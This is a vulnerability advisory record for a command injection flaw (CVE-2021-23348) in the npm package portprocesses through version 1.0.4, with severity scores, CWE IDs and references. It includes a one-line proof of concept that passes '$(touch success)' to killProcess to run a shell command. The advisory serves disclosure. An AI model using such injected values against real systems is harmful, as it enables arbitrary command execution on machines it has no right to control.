GHSA-vm67-7vmg-66vm
Suggest an improvement- Source
- https://github.com/advisories/GHSA-vm67-7vmg-66vm
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-vm67-7vmg-66vm/GHSA-vm67-7vmg-66vm.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-vm67-7vmg-66vm
- Aliases
- Related
- Published
- 2021-04-06T17:24:50Z
- Modified
- 2025-01-14T08:57:06.952048Z
- Severity
-
- 6.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N CVSS Calculator
- Summary
- Arbitrary Command Injection in portprocesses
- Details
-
Impact
An Arbitrary Command Injection vulnerability was reported in
portprocessesimpacting versions <= 1.0.4.Example (Proof of Concept)
The following example demonstrates the vulnerability and will run
touch successtherefore creating a file namedsuccess.const portprocesses = require("portprocesses"); portprocesses.killProcess("$(touch success)"); - Database specific
{ "nvd_published_at": "2021-03-31T15:15:00Z", "github_reviewed_at": "2021-03-31T17:50:32Z", "severity": "MODERATE", "github_reviewed": true, "cwe_ids": [ "CWE-77", "CWE-78" ] }- References
-
- https://github.com/rrainn/PortProcesses/security/advisories/GHSA-vm67-7vmg-66vm
- https://nvd.nist.gov/vuln/detail/CVE-2021-23348
- https://github.com/rrainn/PortProcesses/commit/86811216c9b97b01b5722f879f8c88a7aa4214e1
- https://github.com/rrainn/PortProcesses/blob/fffceb09aff7180afbd0bd172e820404b33c8299/index.js%23L23
- https://snyk.io/vuln/SNYK-JS-PORTPROCESSES-1078536
Affected packages
npm / portprocesses
Package
- Name
- portprocesses
- View open source insights on deps.dev
- Purl
- pkg:npm/portprocesses